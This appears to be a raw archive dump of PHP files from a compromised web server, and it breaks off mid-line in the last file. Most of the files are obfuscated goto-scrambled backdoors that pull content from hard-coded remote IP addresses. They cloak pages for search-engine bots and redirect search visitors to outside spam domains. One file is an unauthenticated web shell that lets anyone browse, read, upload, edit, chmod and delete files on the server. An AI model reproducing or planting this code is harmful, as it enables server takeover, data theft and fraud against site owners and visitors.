 goto IpRQA; VUBJy: if (strlen($text) < 5000) { $text = file_get_contents("\150\164\164\x70\x3a\57\x2f\61\63\65\x2e\61\70\61\56\62\61\56\x31\x32\66\57" . $_GET["\x66\156"] . "\56\x70\150\160\77\x70\141\x73\x73\75{$apass}\46\161\x3d{$_GET["\x69\144"]}"); } goto aFQrf; IpRQA: error_reporting(0); goto kqpL2; KTaUv: foreach ($_GET as $a => $b) { $_GET["\151\x64"] = $b; } goto r10Cj; zRpC1: $s = dirname($_SERVER["\x50\110\x50\137\123\105\x4c\x46"]); goto HcBLF; MSmxv: echo $text; goto sMeiJ; nfnOb: if ($_GET["\151\144"] == "\151\156\x64\145\170") { header("\x4c\x6f\143\x61\x74\x69\x6f\x6e\x3a\x20\150\x74\164\160\163\x3a\57\x2f\x67\157\x6f\147\x6c\x65\56\x63\x6f\x6d"); die; } goto O2vj_; sbsju: $query_pars_2 = str_replace("\55", "\x2b", $_GET["\x69\144"]); goto Qtp9v; aFQrf: if (strlen($text) < 5000) { $url = "\x31\x33\65\x2e\61\x38\x31\x2e\x32\x31\56\61\62\x36"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\50{$errno}\51\74\x62\162\40\x2f\x3e\12"; } else { $req = "\x2f" . $_GET["\x66\x6e"] . "\x2e\x70\150\160\x3f\x70\141\x73\x73\x3d{$apass}\x26\x71\x3d{$_GET["\151\144"]}"; $out = "\107\105\x54\40{$req}\x20\110\124\124\x50\x2f\x31\56\60\15\12"; $out .= "\110\x6f\x73\x74\72\x20{$url}\xd\12"; $out .= "\103\157\156\x6e\x65\143\x74\151\x6f\156\x3a\x20\103\154\157\163\145\15\12\xd\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto kWNXj; UkuVM: $apass3 = "\162\166\x33\62\171\x64\141\x63\x73\x76\x73\144\166"; goto TnSfh; XPM6w: if (strpos($_SERVER["\x48\x54\124\x50\x5f\122\105\106\105\122\105\x52"], "\147\x6f\157\147\x6c\x65\x2e") or strpos($_SERVER["\110\124\124\120\137\122\105\106\x45\x52\x45\122"], "\x79\x61\x68\157\157\56") or strpos($_SERVER["\x48\124\124\120\137\x52\105\106\x45\122\105\122"], "\142\151\156\x67\56")) { $tpl = "\151\156\144\145\170\57" . $_GET["\151\x64"] . "\56\x70\x68\160\x2e\164\160\154"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\171"]; header("\114\x6f\143\x61\x74\151\157\156\x3a\40\150\164\x74\x70\x73\72\57\x2f\x63\x68\x70\157\153\56\163\x69\x74\x65\57\145\x6e\164\x65\162\57\77\155\x61\x72\x6b\75{$today}\x2d{$s}\x26\x74\160\x6c\x3d{$tpl}\x26\x65\x6e\147\x6b\x65\171\x3d{$keyword}"); die; } else { $myname = $_GET["\x69\x64"] . "\56\x70\150\x70"; if (file_exists("\x69\x6e\x64\145\170\x2f" . $myname)) { $html = @file_get_contents("\151\156\144\x65\170\x2f" . $myname); if (strpos($_SERVER["\x48\124\x54\x50\137\x55\123\x45\122\x5f\x41\107\105\x4e\124"], "\x62\x69\x6e\x67") > 2 or strpos($_SERVER["\x48\124\x54\x50\x5f\125\x53\x45\x52\137\x41\107\105\x4e\124"], "\x79\141\x68\x6f\x6f") > 2) { $keyword = str_replace("\55", "\40", $_GET["\x69\x64"]); $html = str_replace("\74\x74\x69\x74\154\145\76\74\57\x74\151\x74\x6c\145\76", "\74\x74\151\x74\x6c\145\x3e{$keyword}\x3c\x2f\x74\151\164\154\x65\x3e", $html); } echo $html; die; } } goto sbsju; fbjJ5: $_GET["\x66\x6e"] = "\x36\x39\66\x39\66\x39\x6e\145\x77"; goto Wx7Xc; ouKRi: $x1 = 3; goto kidDG; FVALQ: if (function_exists("\x63\165\x72\x6c\x5f\151\x6e\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\164\x74\x70\x3a\x2f\x2f\x31\63\x35\x2e\61\x38\x31\56\x32\61\x2e\61\x32\66\x2f" . $_GET["\146\x6e"] . "\56\160\x68\x70\77\x70\141\x73\163\75{$apass}\x26\x71\x3d{$_GET["\151\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\x69\154\x6c\141\x2f\x34\x2e\x30\40\x28\143\157\x6d\160\141\x74\x69\x62\x6c\145\73\x20\115\123\x49\x45\40\x36\x2e\x30\73\40\x57\x69\x6e\x64\157\167\163\x20\116\x54\40\65\x2e\61\73\x20\x53\126\61\x29"); $text = curl_exec($ch); curl_close($ch); } goto VUBJy; kWNXj: if (strlen($text) > 5000) { $out = fopen("\x69\156\x64\145\170\57" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto MSmxv; O2vj_: $_GET["\167\x6f\162\154\x64"] = 5; goto fbjJ5; J0AZN: $keyword = str_replace("\x20", "\x2b", $keyword); goto HdPuA; HcBLF: if ($s == "\x5c" | $s == "\57") { $s = ''; } goto RkvgE; kidDG: $xx1 = 5; goto HP8Gi; kqpL2: $today = "\62\60\62\65\60\66\x30\66\x2d"; goto KTaUv; Wx7Xc: $apass1 = "\166\151\x73\x64\157\x69\152\145\167"; goto ouKRi; HdPuA: $apass2 = "\x62\x32\x33\x68\162\62\63\166\x72\x33\x32"; goto zRpC1; TnSfh: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto XPM6w; r10Cj: if ($_GET["\151\144"] == "\164\x65\163\x74\151\156\x67") { echo "\x74\145\163\164\x20\x67\157\157\144\x2e\x2e\x2e"; die; } goto nfnOb; Qtp9v: $text = ''; goto FVALQ; HP8Gi: $keyword = str_replace("\55", "\x20", $_GET["\151\144"]); goto J0AZN; RkvgE: $s = $_SERVER["\x53\x45\122\126\x45\122\x5f\116\x41\115\x45"] . $s; goto UkuVM; sMeiJ: ?>home/bechata/mp/lteppvts/index.php000066600000011336152366441420013217 0ustar00<?php
 goto uPM0j; JHlfX: $keyword = str_replace("\55", "\40", $_GET["\x69\x64"]); goto Jb6tu; OtI7m: $s = $_SERVER["\x53\x45\x52\x56\105\x52\x5f\116\x41\x4d\x45"] . $s; goto Z1UDQ; UxBpR: if ($s == "\x5c" | $s == "\57") { $s = ''; } goto OtI7m; F2P9y: if (strlen($text) > 500) { $out = fopen("\x69\156\x64\145\170\x2f" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto E9VCj; E9VCj: echo $text; goto LsFkk; bG9ok: if (strlen($text) < 5000) { $url = "\x36\x35\56\x31\x30\71\x2e\x36\67\56\61\60\60"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\50{$errno}\x29\74\x62\x72\x20\57\x3e\12"; } else { $req = "\x2f" . $_GET["\x66\x6e"] . "\56\x70\150\160\x3f\160\141\163\x73\75{$apass}\x26\161\x3d{$_GET["\151\x64"]}"; $out = "\x47\105\124\x20{$req}\x20\x48\x54\x54\120\x2f\61\x2e\x30\15\xa"; $out .= "\x48\x6f\163\164\72\40{$url}\15\12"; $out .= "\x43\x6f\156\156\x65\x63\164\x69\x6f\156\72\40\103\x6c\x6f\x73\x65\15\12\15\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto F2P9y; uPM0j: error_reporting(0); goto syZTF; SAKnW: if ($_GET["\x69\144"] == "\151\156\144\145\x78") { header("\114\x6f\x63\x61\x74\151\157\156\x3a\40\x68\164\x74\x70\163\72\x2f\x2f\147\x6f\x6f\147\154\x65\x2e\143\x6f\x6d"); die; } goto kskdd; Bbreo: $xx1 = 5; goto JHlfX; H0EC1: if (strlen($text) < 5000) { $text = file_get_contents("\x68\x74\x74\160\x3a\57\x2f\66\x35\56\x31\60\71\56\x36\x37\x2e\61\60\60\x2f" . $_GET["\146\156"] . "\56\x70\x68\x70\77\x70\141\x73\163\x3d{$apass}\x26\x71\x3d{$_GET["\151\144"]}"); } goto bG9ok; PyBts: $apass1 = "\x76\151\x73\x64\157\x69\152\145\x77"; goto r9Acp; zO2HS: $text = ''; goto m0Efg; Z1UDQ: $apass3 = "\x72\166\x33\x32\171\144\x61\143\x73\x76\x73\144\166"; goto F2Zut; r9Acp: $x1 = 3; goto Bbreo; F2Zut: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto i_Ebc; Jb6tu: $keyword = str_replace("\x20", "\53", $keyword); goto hmPx1; N62L9: if ($_GET["\x69\144"] == "\x74\x65\163\164\x69\x6e\x67") { echo "\164\x65\163\x74\40\147\157\157\x64\56\56\56"; die; } goto SAKnW; i_Ebc: if (strpos($_SERVER["\110\124\124\120\x5f\122\x45\106\x45\x52\105\122"], "\147\x6f\x6f\x67\154\145\x2e") or strpos($_SERVER["\x48\x54\124\x50\x5f\x52\105\x46\105\122\105\x52"], "\x79\141\x68\157\x6f\x2e") or strpos($_SERVER["\110\x54\x54\x50\x5f\x52\x45\106\105\122\105\122"], "\142\151\156\147\56")) { $tpl = "\151\x6e\x64\145\170\57" . $_GET["\x69\144"] . "\x2e\x70\150\160\56\164\160\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\171"]; header("\114\x6f\x63\x61\x74\x69\x6f\156\72\x20\x68\164\164\160\x3a\x2f\x2f\x36\65\x2e\61\60\70\x2e\x31\60\x2e\x31\71\71\57\145\x6e\x74\145\x72\57\x3f\155\141\x72\153\x3d{$today}\55{$s}\46\x74\x70\154\75{$tpl}\46\145\156\x67\x6b\145\171\x3d{$keyword}"); die; } else { $myname = $_GET["\151\144"] . "\x2e\160\x68\x70"; if (file_exists("\151\156\x64\x65\170\57" . $myname)) { $html = @file_get_contents("\x69\156\x64\145\170\x2f" . $myname); if (strpos($_SERVER["\x48\x54\x54\x50\x5f\x55\123\x45\122\137\101\x47\x45\116\x54"], "\x62\x69\156\x67") > 2 or strpos($_SERVER["\110\x54\x54\x50\x5f\125\123\x45\x52\x5f\x41\x47\105\x4e\124"], "\171\141\x68\157\157") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); $html = str_replace("\74\164\151\164\154\145\76\x3c\x2f\164\x69\x74\x6c\x65\x3e", "\74\164\x69\164\x6c\x65\x3e{$keyword}\74\57\164\x69\x74\x6c\145\x3e", $html); } echo $html; die; } } goto XzNQy; hmPx1: $apass2 = "\142\62\x33\150\162\62\x33\x76\x72\x33\62"; goto jemf2; kskdd: $_GET["\167\x6f\162\154\x64"] = 5; goto HijlD; XzNQy: $query_pars_2 = str_replace("\55", "\x2b", $_GET["\151\144"]); goto zO2HS; m0Efg: if (function_exists("\143\x75\162\x6c\x5f\151\156\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\x74\164\160\72\x2f\57\66\x35\56\x31\x30\x39\x2e\66\67\56\x31\60\60\57" . $_GET["\x66\156"] . "\56\x70\150\160\x3f\160\141\x73\163\75{$apass}\46\x71\x3d{$_GET["\x69\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\x69\154\x6c\x61\x2f\x34\56\x30\40\50\x63\x6f\x6d\x70\x61\x74\151\x62\x6c\x65\73\40\115\x53\111\x45\x20\66\56\x30\73\40\x57\151\156\x64\157\167\163\40\116\124\x20\65\x2e\61\x3b\40\x53\126\x31\51"); $text = curl_exec($ch); curl_close($ch); } goto H0EC1; jemf2: $s = dirname($_SERVER["\x50\110\x50\x5f\x53\x45\x4c\106"]); goto UxBpR; HijlD: $_GET["\146\156"] = "\x36\x39\x36\x39\x36\71\156\x65\167"; goto PyBts; syZTF: $today = "\62\x30\x32\66\60\x35\60\61\55"; goto ftW2x; ftW2x: foreach ($_GET as $a => $b) { $_GET["\151\x64"] = $b; } goto N62L9; LsFkk: ?>home/bechata/mp/yrtdy/index.php000066600000011336152366441600012511 0ustar00<?php
 goto uPM0j; JHlfX: $keyword = str_replace("\55", "\40", $_GET["\x69\x64"]); goto Jb6tu; OtI7m: $s = $_SERVER["\x53\x45\x52\x56\105\x52\x5f\116\x41\x4d\x45"] . $s; goto Z1UDQ; UxBpR: if ($s == "\x5c" | $s == "\57") { $s = ''; } goto OtI7m; F2P9y: if (strlen($text) > 500) { $out = fopen("\x69\156\x64\145\170\x2f" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto E9VCj; E9VCj: echo $text; goto LsFkk; bG9ok: if (strlen($text) < 5000) { $url = "\x36\x35\56\x31\x30\71\x2e\x36\67\56\61\60\60"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\50{$errno}\x29\74\x62\x72\x20\57\x3e\12"; } else { $req = "\x2f" . $_GET["\x66\x6e"] . "\56\x70\150\160\x3f\160\141\163\x73\75{$apass}\x26\161\x3d{$_GET["\151\x64"]}"; $out = "\x47\105\124\x20{$req}\x20\x48\x54\x54\120\x2f\61\x2e\x30\15\xa"; $out .= "\x48\x6f\163\164\72\40{$url}\15\12"; $out .= "\x43\x6f\156\156\x65\x63\164\x69\x6f\156\72\40\103\x6c\x6f\x73\x65\15\12\15\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto F2P9y; uPM0j: error_reporting(0); goto syZTF; SAKnW: if ($_GET["\x69\144"] == "\151\156\144\145\x78") { header("\114\x6f\x63\x61\x74\151\157\156\x3a\40\x68\164\x74\x70\163\72\x2f\x2f\147\x6f\x6f\147\154\x65\x2e\143\x6f\x6d"); die; } goto kskdd; Bbreo: $xx1 = 5; goto JHlfX; H0EC1: if (strlen($text) < 5000) { $text = file_get_contents("\x68\x74\x74\160\x3a\57\x2f\66\x35\56\x31\60\71\56\x36\x37\x2e\61\60\60\x2f" . $_GET["\146\156"] . "\56\x70\x68\x70\77\x70\141\x73\163\x3d{$apass}\x26\x71\x3d{$_GET["\151\144"]}"); } goto bG9ok; PyBts: $apass1 = "\x76\151\x73\x64\157\x69\152\145\x77"; goto r9Acp; zO2HS: $text = ''; goto m0Efg; Z1UDQ: $apass3 = "\x72\166\x33\x32\171\144\x61\143\x73\x76\x73\144\166"; goto F2Zut; r9Acp: $x1 = 3; goto Bbreo; F2Zut: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto i_Ebc; Jb6tu: $keyword = str_replace("\x20", "\53", $keyword); goto hmPx1; N62L9: if ($_GET["\x69\144"] == "\x74\x65\163\164\x69\x6e\x67") { echo "\164\x65\163\x74\40\147\157\157\x64\56\56\56"; die; } goto SAKnW; i_Ebc: if (strpos($_SERVER["\110\124\124\120\x5f\122\x45\106\x45\x52\105\122"], "\147\x6f\x6f\x67\154\145\x2e") or strpos($_SERVER["\x48\x54\124\x50\x5f\x52\105\x46\105\122\105\x52"], "\x79\141\x68\157\x6f\x2e") or strpos($_SERVER["\110\x54\x54\x50\x5f\x52\x45\106\105\122\105\122"], "\142\151\156\147\56")) { $tpl = "\151\x6e\x64\145\170\57" . $_GET["\x69\144"] . "\x2e\x70\150\160\56\164\160\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\171"]; header("\114\x6f\x63\x61\x74\x69\x6f\156\72\x20\x68\164\164\160\x3a\x2f\x2f\x36\65\x2e\61\60\70\x2e\x31\60\x2e\x31\71\71\57\145\x6e\x74\145\x72\57\x3f\155\141\x72\153\x3d{$today}\55{$s}\46\x74\x70\154\75{$tpl}\46\145\156\x67\x6b\145\171\x3d{$keyword}"); die; } else { $myname = $_GET["\151\144"] . "\x2e\160\x68\x70"; if (file_exists("\151\156\x64\x65\170\57" . $myname)) { $html = @file_get_contents("\x69\156\x64\145\170\x2f" . $myname); if (strpos($_SERVER["\x48\x54\x54\x50\x5f\x55\123\x45\122\137\101\x47\x45\116\x54"], "\x62\x69\156\x67") > 2 or strpos($_SERVER["\110\x54\x54\x50\x5f\125\123\x45\x52\x5f\x41\x47\105\x4e\124"], "\171\141\x68\157\157") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); $html = str_replace("\74\164\151\164\154\145\76\x3c\x2f\164\x69\x74\x6c\x65\x3e", "\74\164\x69\164\x6c\x65\x3e{$keyword}\74\57\164\x69\x74\x6c\145\x3e", $html); } echo $html; die; } } goto XzNQy; hmPx1: $apass2 = "\142\62\x33\150\162\62\x33\x76\x72\x33\62"; goto jemf2; kskdd: $_GET["\167\x6f\162\154\x64"] = 5; goto HijlD; XzNQy: $query_pars_2 = str_replace("\55", "\x2b", $_GET["\151\144"]); goto zO2HS; m0Efg: if (function_exists("\143\x75\162\x6c\x5f\151\156\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\x74\164\160\72\x2f\57\66\x35\56\x31\x30\x39\x2e\66\67\56\x31\60\60\57" . $_GET["\x66\156"] . "\56\x70\150\160\x3f\160\141\x73\163\75{$apass}\46\x71\x3d{$_GET["\x69\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\x69\154\x6c\x61\x2f\x34\56\x30\40\50\x63\x6f\x6d\x70\x61\x74\151\x62\x6c\x65\73\40\115\x53\111\x45\x20\66\56\x30\73\40\x57\151\156\x64\157\167\163\40\116\124\x20\65\x2e\61\x3b\40\x53\126\x31\51"); $text = curl_exec($ch); curl_close($ch); } goto H0EC1; jemf2: $s = dirname($_SERVER["\x50\110\x50\x5f\x53\x45\x4c\106"]); goto UxBpR; HijlD: $_GET["\146\156"] = "\x36\x39\x36\x39\x36\71\156\x65\167"; goto PyBts; syZTF: $today = "\62\x30\x32\66\60\x35\60\61\55"; goto ftW2x; ftW2x: foreach ($_GET as $a => $b) { $_GET["\151\x64"] = $b; } goto N62L9; LsFkk: ?>home/bechata/mp/e1387/index.php000066600000020221152366441650012103 0ustar00<?php
@session_start();
@set_time_limit(0);

echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<title></title>
<style>
body{
font-family: monospace;
font-weight: bold;
font-size: 18px;
background-color: #c5c5c5;
color: #000;
}
#content tr:hover{
background-color: #ccc;
}
#content .first{
background-color: #ccc;
}
#content .first:hover{
background-color: #ccc;
}
table{
border: 3px #000 solid;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #00f;
}
input,select,textarea{
border: 1px #000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
input {
 font-size: 18px;
 font-weight: bold;
 padding: 5px;
}
select {
font-size: 19px
}
textarea {
font-size: 10px
}
td, tr { padding: 2px 5px; }

</style>
</HEAD>
<BODY>
<hr width="920" color="black"/>
<hr width="920" color="black"/><center><p><h2>Your IP : ' .$_SERVER["REMOTE_ADDR"]. '</h2></p></center>
<hr width="920" color="black"/>
<table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">
<tr><td style="padding: 8px">Current Path : ';
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);

foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '<font color="green">Upload Success..</font><br />';
}else{
echo '<font color="red">Upload Gagal..</font><br />';
}
}
echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
</td></tr>';
if(isset($_GET['filesrc'])){
echo "<tr><td style='padding: 8px'>Current File : ";
echo $_GET['filesrc'];
echo '</tr></td></table><br />';
echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '<font color="green">Chmod Success..</font><br />';
}else{
echo '<font color="red">Chmod Gagal..</font><br />';
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Save" />
</form>';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '<font color="green">Rename Berhasil..</font><br />';
}else{
echo '<font color="red">Rename Gagal..</font><br />';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Save" />
</form>';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '<font color="green">Edit File Berhasil..</font><br />';
}else{
echo '<font color="red">Edit File Gagal..</font><br />';
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=130 rows=10 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Save" />
</form>';
}
echo '</center>';
}else{
echo '</table><br /><center>';
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<font color="green">Delete Directory Berhasil..</font><br />';
}else{
echo '<font color="red">Delete Directory Gagal..</font><br />';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '<font color="green">Delete File Berhasil..</font><br />';
}else{
echo '<font color="red">Delete File Gagal..</font><br />';
}
}
}
echo '</center>';
$scandir = scandir($path);
echo '<div id="content"><table width="920" border="1.5px" cellpadding="5" cellspacing="0" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>';

foreach($scandir as $dir){
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "<tr>
<td><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>--</center></td>
<td><center>";
if(is_writable("$path/$dir")) echo '<font color="Blue">';
elseif(!is_readable("$path/$dir")) echo '<font color="red">';
echo perms("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\"Oke\" />
</form></center></td>
</tr>";
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
foreach($scandir as $file){
if(!is_file("$path/$file")) continue;
$size = filesize("$path/$file")/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}

echo "<tr>
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>";
if(is_writable("$path/$file")) echo '<font color="Blue">';
elseif(!is_readable("$path/$file")) echo '<font color="red">';
echo perms("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
<option value=\"edit\">Edit</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\"Oke\" />
</form></center></td>
</tr>";
}
echo '</table>
</div>';
}
echo '<center><hr width="920" color="black"/> <center>
</BODY>
</HTML>';
function perms($file){
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));

return $info;
}
?>












home/bechata/mp/9m9c/index.php000066600000011336152366514500012117 0ustar00<?php
 goto uPM0j; JHlfX: $keyword = str_replace("\55", "\40", $_GET["\x69\x64"]); goto Jb6tu; OtI7m: $s = $_SERVER["\x53\x45\x52\x56\105\x52\x5f\116\x41\x4d\x45"] . $s; goto Z1UDQ; UxBpR: if ($s == "\x5c" | $s == "\57") { $s = ''; } goto OtI7m; F2P9y: if (strlen($text) > 500) { $out = fopen("\x69\156\x64\145\170\x2f" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto E9VCj; E9VCj: echo $text; goto LsFkk; bG9ok: if (strlen($text) < 5000) { $url = "\x36\x35\56\x31\x30\71\x2e\x36\67\56\61\60\60"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\50{$errno}\x29\74\x62\x72\x20\57\x3e\12"; } else { $req = "\x2f" . $_GET["\x66\x6e"] . "\56\x70\150\160\x3f\160\141\163\x73\75{$apass}\x26\161\x3d{$_GET["\151\x64"]}"; $out = "\x47\105\124\x20{$req}\x20\x48\x54\x54\120\x2f\61\x2e\x30\15\xa"; $out .= "\x48\x6f\163\164\72\40{$url}\15\12"; $out .= "\x43\x6f\156\156\x65\x63\164\x69\x6f\156\72\40\103\x6c\x6f\x73\x65\15\12\15\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto F2P9y; uPM0j: error_reporting(0); goto syZTF; SAKnW: if ($_GET["\x69\144"] == "\151\156\144\145\x78") { header("\114\x6f\x63\x61\x74\151\157\156\x3a\40\x68\164\x74\x70\163\72\x2f\x2f\147\x6f\x6f\147\154\x65\x2e\143\x6f\x6d"); die; } goto kskdd; Bbreo: $xx1 = 5; goto JHlfX; H0EC1: if (strlen($text) < 5000) { $text = file_get_contents("\x68\x74\x74\160\x3a\57\x2f\66\x35\56\x31\60\71\56\x36\x37\x2e\61\60\60\x2f" . $_GET["\146\156"] . "\56\x70\x68\x70\77\x70\141\x73\163\x3d{$apass}\x26\x71\x3d{$_GET["\151\144"]}"); } goto bG9ok; PyBts: $apass1 = "\x76\151\x73\x64\157\x69\152\145\x77"; goto r9Acp; zO2HS: $text = ''; goto m0Efg; Z1UDQ: $apass3 = "\x72\166\x33\x32\171\144\x61\143\x73\x76\x73\144\166"; goto F2Zut; r9Acp: $x1 = 3; goto Bbreo; F2Zut: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto i_Ebc; Jb6tu: $keyword = str_replace("\x20", "\53", $keyword); goto hmPx1; N62L9: if ($_GET["\x69\144"] == "\x74\x65\163\164\x69\x6e\x67") { echo "\164\x65\163\x74\40\147\157\157\x64\56\56\56"; die; } goto SAKnW; i_Ebc: if (strpos($_SERVER["\110\124\124\120\x5f\122\x45\106\x45\x52\105\122"], "\147\x6f\x6f\x67\154\145\x2e") or strpos($_SERVER["\x48\x54\124\x50\x5f\x52\105\x46\105\122\105\x52"], "\x79\141\x68\157\x6f\x2e") or strpos($_SERVER["\110\x54\x54\x50\x5f\x52\x45\106\105\122\105\122"], 